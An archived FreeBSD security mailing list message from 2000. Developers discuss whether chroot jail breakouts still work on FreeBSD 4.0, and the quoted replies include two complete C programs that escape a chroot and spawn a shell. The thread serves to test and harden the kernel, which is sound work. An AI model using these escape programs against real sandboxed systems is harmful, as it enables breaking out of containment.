Date: Thu, 18 May 2000 23:20:41 +0200 From: Poul-Henning Kamp <phk@critter.freebsd.dk> To: Harold Gutch <logix@foobar.franken.de> Cc: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>, Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>, freebsd-security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <2780.958684841@critter.freebsd.dk> In-Reply-To: Your message of "Fri, 12 May 2000 20:06:19 %2B0200." <20000512200619.A14067@foobar.franken.de>
next in thread | previous in thread | raw e-mail | index | archive | help
Please check the action of the "kern.chroot_allow_open_directories"
for a deeper explanation of this one. It is not set to zero for
fear of compatibility issues. Maybe we should set it to zero in
-current to see if there are any such issues.
Poul-Henning
In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes:
>On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
>> chrooted environment including jail, however testing the break out of
>> jail exploit (good thing I tested before I spoke), which BTW worked on
>> FreeBSD-3 and numerous other platforms including Linux, Solaris, and
>> Tru64-UNIX, appears to no longer work under 4.0 -- which is a good
>> thing! When did the FreeBSD chroot(2) get fixed?
>>
>> Once again FreeBSD leads the way.
>>
>> Following is the break-out-of-jail code.
>>
>> #include <unistd.h>
>> #include <assert.h>
>>
>> const char *shell = "/bin/sh";
>> const char *lowerdir = "/tmp";
>>
>> int main() {
>> int i;
>>
>> assert(chdir("/") != -1);
>> assert(chroot(lowerdir) != -1);
>> for (i = 0; i < 32; i++)
>> assert(chdir("..") != -1);
>> assert(chroot(".") != -1);
>>
>> assert(execl(shell, shell, NULL) != -1);
>> };
>
>
>What about the "other" chroot-breakout, does it still work under
>FreeBSD 4.0?
>Here's the breakout-code modulo checks wether /tmp exists etc.
>
>#include <fcntl.h>
>#include <stdlib.h>
>#include <unistd.h>
>
>int main(int argc, char *argv[])
>{
> int handle, i;
>
> handle = open("/", O_RDONLY);
> chroot("/tmp");
> chdir("/");
> fchdir(handle);
> for (i = 0; i < 32; i++)
> chdir("..");
> chroot(".");
> chdir("/");
> system("/bin/sh");
>
> return 0;
>}
>
>bye,
> Harold
>
>--
>Someone should do a study to find out how many human life spans have
>been lost waiting for NT to reboot.
> Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc
>
--
Poul-Henning Kamp | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?2780.958684841>